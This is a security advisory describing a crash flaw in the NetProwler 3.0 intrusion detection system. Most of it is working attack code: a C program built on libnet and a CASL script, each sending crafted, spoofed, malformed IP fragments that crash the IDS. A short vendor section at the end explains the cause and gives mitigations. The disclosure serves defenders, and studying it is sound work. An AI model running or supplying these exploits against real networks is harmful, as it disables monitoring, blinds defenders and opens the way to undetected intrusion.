COMMAND
NetProwler
SYSTEMS AFFECTED
NetProwler (Axent)
PROBLEM
Rain Forest Puppy (RFP) found following. The demonstration below
dribbles two fragmented IP packets to an IP address which is
profiled by NetProwler IDS version 3.0. The result is that
NetProwler chokes, dropping into a lovely Dr. Watson error
message. Note that this was tested with an older version (3.0),
since Axent hasn't sent an evaluation key for the latest version
downloadable from the web. Also note that NetProwler needs to be
profiling the FTP service on the victim for this to be effective.
This was found using Dug Song/Anzen's awesome Fragrouter program:
http://www.anzen.com/research/nidsbench/
Also, NetProwler stores incoming alert information in a Jet .mdb.
PoC:
/* RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net
Kills NetProwler IDS version 3.0
You need libnet installed. It's available from
www.packetfactory.net. Acks to route.
Only tested on RH 6.x Linux. To compile:
gcc RFProwl.c -lnet -o RFProwl
Plus, make sure your architecture is defined below: */
#define LIBNET_LIL_ENDIAN 1
#undef LIBNET_BIG_ENDIAN 1
#include <libnet.h>
/* it's just much easier to code in the packet frags we want. :) */
char pack1[]="\x45\x00"
"\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char pack2[]="\x45\x00"
"\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
"\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";
int main(int argc, char **argv) {
int sock, c;
u_long src_ip, dst_ip;
printf("RFProwl - rain forest puppy / wiretrip\n");
if(argc<3){
printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n");
exit(EXIT_FAILURE);}
dst_ip=inet_addr(argv[1]);
src_ip=inet_addr(argv[2]);
memcpy(pack1+16,&dst_ip,4);
memcpy(pack2+16,&dst_ip,4);
memcpy(pack1+12,&src_ip,4);
memcpy(pack1+12,&src_ip,4);
sock = open_raw_sock(IPPROTO_RAW);
if (sock == -1){
perror("Socket problems: ");
exit(EXIT_FAILURE);}
c = write_ip(sock, pack1, 46);
if (c < 46) printf("Write_ip #1 choked\n");
c = write_ip(sock, pack2, 46);
if (c < 46) printf("Write_ip #2 choked\n");
printf("Packets sent\n");
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);}
There is a CASL Script that reproduces the RFProwl.c exploit.
This exploit sends two packets with wrong IP checksum:
#include "tcpip.casl"
#include "packets.casl"
Src = pop args;
Dst = pop args;
Src = getip(Src);
Dst = getip(Dst);
iph = copy TCPIP;
iph.ip_version = 4;
iph.ip_headerlen = 5;
iph.ip_tos = 0;
iph.ip_length = 36;
iph.ip_id = 2233;
iph.ip_offset = 3;
iph.ip_ttl = 62;
iph.ip_protocol = 6;
iph.ip_cksum = 38648;
iph.ip_source = Src;
iph.ip_destination = Dst;
tch = copy SYN;
tch.tcp_source = 1026;
tch.tcp_destination = 2058;
tch.tcp_seqno = 2542901;
tch.tcp_ackno = 0;
tch.tcp_offset = 0;
tch.tcp_x2 = 1;
tch.tcp_syn = 1;
tch.tcp_window = 768;
pk1data = "\x 0\x 0\x 0\x 0\x 0\x 0";
packet = [ iph, tch, pk1data ];
ip_output(packet);
iph2 = copy TCPIP;
iph2.ip_version = 4;
iph2.ip_headerlen = 5;
iph2.ip_tos = 0;
iph2.ip_length = 44;
iph2.ip_id = 2239;
iph2.ip_mf = 1;
iph2.ip_ttl = 62;
iph2.ip_protocol = 6;
iph2.ip_cksum = 30445;
iph2.ip_source = Src;
iph2.ip_destination = Dst;
tch2 = copy SYN;
tch2.tcp_source = 1032;
tch2.tcp_destination = 21;
tch2.tcp_seqno = 2816737352;
tch2.tcp_ackno = 0;
tch2.tcp_x2 = 10;
tch2.tcp_syn = 1;
tch2.tcp_window = 32120;
tch2.tcp_cksum = 29341;
pk2data = "\x 2\x 4\x 5\xb4 \x 0\x 0";
packet = [ iph2, tch2, pk2data ];
ip_output(packet);
SOLUTION
NetProwler 3.0 will crash if the Man-in-the-Middle signature
encounters a packet for which the following expression evaluates
to true:
(IP_HEADER_LENGTH + TCP_HEADER_LENGTH) > IP_TOTAL_LENGTH
This is not a packet fragmentation problem. It is an issue with
specific malformed packets. This problem has been fixed in
NetProwler 3.5, and the code has been reviewed for other similar
issues. Solutions:
1. In NetProwler 3.0, disable the Man-in-the-Middle signature
for all monitored hosts.
2. Upgrade to NetProwler 3.5 (to be released in June 2000).